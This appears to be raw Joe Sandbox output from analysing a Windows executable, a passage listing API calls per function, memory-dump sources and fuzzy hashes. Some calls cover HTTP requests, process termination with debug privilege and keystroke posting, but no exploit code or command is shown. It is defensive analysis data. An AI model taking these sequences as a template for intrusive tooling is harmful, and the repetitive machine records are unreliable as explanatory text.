                                                                                                                                        • String ID: Ping
                                                                                                                                        • API String ID: 1028309954-2246546115
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007C9C68
                                                                                                                                        • CreateMenu.USER32 ref: 007C9C83
                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 007C9C92
                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007C9D1F
                                                                                                                                        • IsMenu.USER32(?), ref: 007C9D35
                                                                                                                                        • CreatePopupMenu.USER32 ref: 007C9D3F
                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007C9D70
                                                                                                                                        • DrawMenuBar.USER32 ref: 007C9D7E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 176399719-4108050209
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 007AEC1E
                                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007AEC94
                                                                                                                                        • GetLastError.KERNEL32 ref: 007AEC9E
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 007AED0B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                        • API String ID: 4194297153-14809454
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0079C782
                                                                                                                                        • GetDlgCtrlID.USER32 ref: 0079C78D
                                                                                                                                        • GetParent.USER32 ref: 0079C7A9
                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0079C7AC
                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 0079C7B5
                                                                                                                                        • GetParent.USER32(?), ref: 0079C7D1
                                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0079C7D4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 313823418-1403004172
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0079C869
                                                                                                                                        • GetDlgCtrlID.USER32 ref: 0079C874
                                                                                                                                        • GetParent.USER32 ref: 0079C890
                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0079C893
                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 0079C89C
                                                                                                                                        • GetParent.USER32(?), ref: 0079C8B8
                                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0079C8BB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 313823418-1403004172
                                                                                                                                        APIs
                                                                                                                                        • GetParent.USER32 ref: 0079C8D9
                                                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 0079C8EE
                                                                                                                                        • _wcscmp.LIBCMT ref: 0079C900
                                                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0079C97B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                        • API String ID: 1704125052-3381328864
                                                                                                                                        APIs
                                                                                                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 007AB137
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ArraySafeVartype
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1725837607-0
                                                                                                                                        APIs
                                                                                                                                        • __lock.LIBCMT ref: 0078BA74
                                                                                                                                          • Part of subcall function 00788984: __mtinitlocknum.LIBCMT ref: 00788996
                                                                                                                                          • Part of subcall function 00788984: RtlEnterCriticalSection.NTDLL(00780127), ref: 007889AF
                                                                                                                                        • __calloc_crt.LIBCMT ref: 0078BA85
                                                                                                                                          • Part of subcall function 00787616: __calloc_impl.LIBCMT ref: 00787625
                                                                                                                                          • Part of subcall function 00787616: Sleep.KERNEL32(00000000,?,00780127,?,0076125D,00000058,?,?), ref: 0078763C
                                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0078BAA0
                                                                                                                                        • GetStartupInfoW.KERNEL32(?,00816990,00000064,00786B14,008167D8,00000014), ref: 0078BAF9
                                                                                                                                        • __calloc_crt.LIBCMT ref: 0078BB44
                                                                                                                                        • GetFileType.KERNEL32(00000001), ref: 0078BB8B
                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0078BBC4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1426640281-0
                                                                                                                                        APIs
                                                                                                                                        • __swprintf.LIBCMT ref: 007A7226
                                                                                                                                        • __swprintf.LIBCMT ref: 007A7233
                                                                                                                                          • Part of subcall function 0078234B: __woutput_l.LIBCMT ref: 007823A4
                                                                                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 007A725D
                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 007A7269
                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 007A7276
                                                                                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 007A7296
                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 007A72A8
                                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 007A72B7
                                                                                                                                        • LockResource.KERNEL32(?), ref: 007A72C3
                                                                                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 007A7322
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1433390588-0
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 007A4A7D
                                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,007A3AD7,?,00000001), ref: 007A4A91
                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 007A4A98
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007A3AD7,?,00000001), ref: 007A4AA7
                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 007A4AB9
                                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,007A3AD7,?,00000001), ref: 007A4AD2
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007A3AD7,?,00000001), ref: 007A4AE4
                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007A3AD7,?,00000001), ref: 007A4B29
                                                                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,007A3AD7,?,00000001), ref: 007A4B3E
                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,007A3AD7,?,00000001), ref: 007A4B49
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2156557900-0
                                                                                                                                        APIs
                                                                                                                                        • GetClientRect.USER32(?), ref: 007DEC32
                                                                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 007DEC49
                                                                                                                                        • GetWindowDC.USER32(?), ref: 007DEC55
                                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 007DEC64
                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 007DEC76
                                                                                                                                        • GetSysColor.USER32(00000005), ref: 007DEC94
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 272304278-0
                                                                                                                                        APIs
                                                                                                                                        • EnumChildWindows.USER32(?,0079DD46), ref: 0079DC86
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ChildEnumWindows
                                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                        • API String ID: 3555792229-1603158881
                                                                                                                                        APIs
                                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007645F0
                                                                                                                                        • CoUninitialize.COMBASE ref: 00764695
                                                                                                                                        • UnregisterHotKey.USER32(?), ref: 007647BD
                                                                                                                                        • DestroyWindow.USER32(?), ref: 007D5936
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 007D599D
                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 007D59CA
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                        • String ID: close all
                                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                                        APIs
                                                                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 0077C2D2
                                                                                                                                          • Part of subcall function 0077C697: GetClientRect.USER32(?,?), ref: 0077C6C0
                                                                                                                                          • Part of subcall function 0077C697: GetWindowRect.USER32(?,?), ref: 0077C701
                                                                                                                                          • Part of subcall function 0077C697: ScreenToClient.USER32(?,000000FF), ref: 0077C729
                                                                                                                                        • GetDC.USER32 ref: 007DE006
                                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007DE019
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 007DE027
                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 007DE03C
                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 007DE044
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007DE0CF
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                        • String ID: U
                                                                                                                                        • API String ID: 4009187628-3372436214
                                                                                                                                        APIs
                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007B4C5E
                                                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007B4C8A
                                                                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 007B4CCC
                                                                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 007B4CE1
                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007B4CEE
                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 007B4D1E
                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 007B4D65
                                                                                                                                          • Part of subcall function 007B56A9: GetLastError.KERNEL32(?,?,007B4A2B,00000000,00000000,00000001), ref: 007B56BE
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1241431887-3916222277
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,007FDBF0), ref: 007BBBA1
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007FDBF0), ref: 007BBBD5
                                                                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007BBD33
                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 007BBD5D
                                                                                                                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 007BBEAD
                                                                                                                                        • ProgIDFromCLSID.COMBASE(?,?), ref: 007BBEF7
                                                                                                                                        • CoTaskMemFree.COMBASE(?), ref: 007BBF14
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 793797124-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007649CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00764954,00000000), ref: 00764A23
                                                                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0077B85B), ref: 0077B926
                                                                                                                                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0077B85B,00000000,?,?,0077AF1E,?,?), ref: 0077B9BD
                                                                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 007DE775
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 007DE7EB
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2402799130-0
                                                                                                                                        APIs
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007CB204
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InvalidateRect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 634782764-0
                                                                                                                                        • Opcode ID: a6a34f77cae889ee778c17562e1cdec1a4e6f85d04aea88384f98aee9f5bcdb1
                                                                                                                                        • Instruction ID: 8642dfe7406f76b56c4fb96680ef005523663327f475f8685b9701935f175843
                                                                                                                                        • Opcode Fuzzy Hash: a6a34f77cae889ee778c17562e1cdec1a4e6f85d04aea88384f98aee9f5bcdb1
                                                                                                                                        • Instruction Fuzzy Hash: 63517130600258FFEF309B688C9AF9E7B65FB0A360F24811DFA15D61A1C779ED509B50
                                                                                                                                        APIs
                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 007DE9EA
                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007DEA0B
                                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007DEA20
                                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 007DEA3D
                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007DEA64
                                                                                                                                        • DestroyCursor.USER32(00000000), ref: 007DEA6F
                                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007DEA8C
                                                                                                                                        • DestroyCursor.USER32(00000000), ref: 007DEA97
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3992029641-0
                                                                                                                                        • Opcode ID: bbbba833f98485f9d0ec69715ce820ca620a96a57575cb6f6c60736db67d0326
                                                                                                                                        • Instruction ID: e9242d45c0718e3696d9cd1c2e06ef2a91970084aabcebd34a29a7e216d2b92c
                                                                                                                                        • Opcode Fuzzy Hash: bbbba833f98485f9d0ec69715ce820ca620a96a57575cb6f6c60736db67d0326
                                                                                                                                        • Instruction Fuzzy Hash: 14517A70600205EFEF20DF64CC85FAA77B5BB98390F108629F94ADB290D778EC918B51
                                                                                                                                        APIs
                                                                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,007DE9A0,00000004,00000000,00000000), ref: 0077F737
                                                                                                                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,007DE9A0,00000004,00000000,00000000), ref: 0077F77E
                                                                                                                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,007DE9A0,00000004,00000000,00000000), ref: 007DEB55
                                                                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,007DE9A0,00000004,00000000,00000000), ref: 007DEBC1
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ShowWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1268545403-0
                                                                                                                                        • Opcode ID: de07ff0f0394f00ca0d0526bf2902545ac5657ca607ae0697f522cc4ac7de588
                                                                                                                                        • Instruction ID: b0d7121128d30aa4d9e91c36ca912f1847e6c0e0b167eae43223a585ffe7d484
                                                                                                                                        • Opcode Fuzzy Hash: de07ff0f0394f00ca0d0526bf2902545ac5657ca607ae0697f522cc4ac7de588
                                                                                                                                        • Instruction Fuzzy Hash: E2411B70304680DADF3D5B288ECCB7A7AA56B55395FA4C83FE08F8B561C67CA840D751
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 0079E158
                                                                                                                                          • Part of subcall function 0079E138: GetCurrentThreadId.KERNEL32 ref: 0079E15F
                                                                                                                                          • Part of subcall function 0079E138: AttachThreadInput.USER32(00000000,?,0079CD34,?,00000001), ref: 0079E166
                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0079CE06
                                                                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0079CE23
                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0079CE26
                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0079CE2F
                                                                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0079CE4D
                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0079CE50
                                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0079CE59
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0079CE70
                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0079CE73
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2014098862-0
                                                                                                                                        • Opcode ID: 6baf842eb411e14cb2cee00de845d1e32f2696c6c6874a3f98b9b5c6051c63f8
                                                                                                                                        • Instruction ID: f4f7980872e668b9d65a5677a1d5a5b4f4b0377418f83085bbc6be63670b0e60
                                                                                                                                        • Opcode Fuzzy Hash: 6baf842eb411e14cb2cee00de845d1e32f2696c6c6874a3f98b9b5c6051c63f8
                                                                                                                                        • Instruction Fuzzy Hash: 541104B155061CBFFB216F609C8EF6A3A2DDB0C794F110415F3406F0E0C9FA6C009AA8
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079A857: CLSIDFromProgID.COMBASE ref: 0079A874
                                                                                                                                          • Part of subcall function 0079A857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 0079A88F
                                                                                                                                          • Part of subcall function 0079A857: lstrcmpiW.KERNEL32(?,00000000), ref: 0079A89D
                                                                                                                                          • Part of subcall function 0079A857: CoTaskMemFree.COMBASE(00000000), ref: 0079A8AD
                                                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 007BC6AD
                                                                                                                                        • _memset.LIBCMT ref: 007BC6BA
                                                                                                                                        • _memset.LIBCMT ref: 007BC7D8
                                                                                                                                        • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 007BC804
                                                                                                                                        • CoTaskMemFree.COMBASE(?), ref: 007BC80F
                                                                                                                                        Strings
                                                                                                                                        • NULL Pointer assignment, xrefs: 007BC85D
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                                        • API String ID: 1300414916-2785691316
                                                                                                                                        • Opcode ID: 4dfd86f2fee62486b65c02674ded70ed0d600c0b04ff0f990ded9a2454210187
                                                                                                                                        • Instruction ID: c9da063fdbda08eeac2fd7f1dced819f771bd0b6c1efb96880c03f324bd18a10
                                                                                                                                        • Opcode Fuzzy Hash: 4dfd86f2fee62486b65c02674ded70ed0d600c0b04ff0f990ded9a2454210187
                                                                                                                                        • Instruction Fuzzy Hash: 8E912A71D00218EBDB21DFA4DC85EDEBBB9EF08750F10816AF919A7281DB745A45CFA0
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007C9926
                                                                                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 007C993A
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007C9954
                                                                                                                                        • _wcscat.LIBCMT ref: 007C99AF
                                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 007C99C6
                                                                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007C99F4
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window_wcscat
                                                                                                                                        • String ID: SysListView32
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007A6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007A6F7D
                                                                                                                                          • Part of subcall function 007A6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 007A6F8D
                                                                                                                                          • Part of subcall function 007A6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 007A7022
                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007C168B
                                                                                                                                        • GetLastError.KERNEL32 ref: 007C169E
                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007C16CA
                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 007C1746
                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 007C1751
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 007C1786
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                        • String ID: SeDebugPrivilege
                                                                                                                                        APIs
                                                                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 007A62D6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconLoad
                                                                                                                                        • String ID: blank$info$question$stop$warning
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 007A7595
                                                                                                                                        • LoadStringW.USER32(00000000), ref: 007A759C
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007A75B2
                                                                                                                                        • LoadStringW.USER32(00000000), ref: 007A75B9
                                                                                                                                        • _wprintf.LIBCMT ref: 007A75DF
                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007A75FD
                                                                                                                                        Strings
                                                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 007A75DA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                          • Part of subcall function 007C3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C2AA6,?,?), ref: 007C3B0E
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C2AE7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                                        • String ID:
                                                                                                                                        APIs
                                                                                                                                        • select.WS2_32 ref: 007B9B38
                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 007B9B45
                                                                                                                                        • __WSAFDIsSet.WS2_32(00000000,?), ref: 007B9B6F
                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 007B9B9F
                                                                                                                                        • htons.WS2_32(?), ref: 007B9C51
                                                                                                                                        • inet_ntoa.WS2_32(?), ref: 007B9C0C
                                                                                                                                          • Part of subcall function 0079E0F5: _strlen.LIBCMT ref: 0079E0FF
                                                                                                                                          • Part of subcall function 0079E0F5: _memmove.LIBCMT ref: 0079E121
                                                                                                                                        • _strlen.LIBCMT ref: 007B9CA7
                                                                                                                                        • _memmove.LIBCMT ref: 007B9D10
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
